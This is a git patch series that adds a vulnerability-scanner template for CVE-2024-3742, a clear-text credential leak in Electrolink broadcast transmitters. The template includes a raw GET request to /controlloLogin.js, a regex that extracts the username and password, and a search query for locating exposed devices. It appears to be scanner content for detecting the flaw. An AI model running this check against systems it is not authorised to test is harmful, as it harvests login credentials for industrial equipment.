From 4b854568f63b1dbe9395f05be10234d009c13cda Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 12 Jul 2024 16:03:11 +0530 Subject: [PATCH 1/3] Create CVE-2024-3742.yaml --- http/cves/2024/CVE-2024-3742.yaml | 45 +++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 http/cves/2024/CVE-2024-3742.yaml diff --git a/http/cves/2024/CVE-2024-3742.yaml b/http/cves/2024/CVE-2024-3742.yaml new file mode 100644 index 0000000000..89948c3e35 --- /dev/null +++ b/http/cves/2024/CVE-2024-3742.yaml @@ -0,0 +1,45 @@ +id: CVE-2024-3742 + +info: + name: Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credentials Disclosure + author: Farish + severity: high + description: | + Electrolink transmitters store credentials in clear-text. Use of these credentials could allow an attacker to access the system. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5790.php + - https://nvd.nist.gov/vuln/detail/CVE-2024-3742 + - https://packetstormsecurity.com/files/174875/ + - https://www.cisa.gov/news-events/ics-advisories/icsa-24-107-02 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-3742 + cwe-id: CWE-312 + epss-score: 0.00043 + epss-percentile: 0.09257 + metadata: + verified: true + max-request: 1 + fofa-query: "Electrolink s.r.l." + tags: packetstorm,cve,cve2024,electrolink,info-leak + +http: + - raw: + - | + GET /controlloLogin.js HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(content_type, "application/x-javascript")' + - 'contains(body, "user==") && contains(body, "password==")' + - 'status_code == 200' + condition: and + + extractors: + - type: regex + part: body + regex: + - user\s*==\s*'([^']*)'\s*&&\s*password\s*==\s*'([^']*)' From 8a7222c62edd3b3b5a4790c4ce10a10ce4c3019e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 12 Jul 2024 16:05:36 +0530 Subject: [PATCH 2/3] trail-space fix --- http/cves/2024/CVE-2024-3742.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-3742.yaml b/http/cves/2024/CVE-2024-3742.yaml index 89948c3e35..4973606194 100644 --- a/http/cves/2024/CVE-2024-3742.yaml +++ b/http/cves/2024/CVE-2024-3742.yaml @@ -29,7 +29,7 @@ http: - | GET /controlloLogin.js HTTP/1.1 Host: {{Hostname}} - + matchers: - type: dsl dsl: From 6255fa6f190193367f0fcea8efdb1aaaa05d5ea4 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 12 Jul 2024 20:37:00 +0530 Subject: [PATCH 3/3] Update CVE-2024-3742.yaml --- http/cves/2024/CVE-2024-3742.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-3742.yaml b/http/cves/2024/CVE-2024-3742.yaml index 4973606194..098d5d51d7 100644 --- a/http/cves/2024/CVE-2024-3742.yaml +++ b/http/cves/2024/CVE-2024-3742.yaml @@ -1,7 +1,7 @@ id: CVE-2024-3742 info: - name: Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credentials Disclosure + name: Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure author: Farish severity: high description: |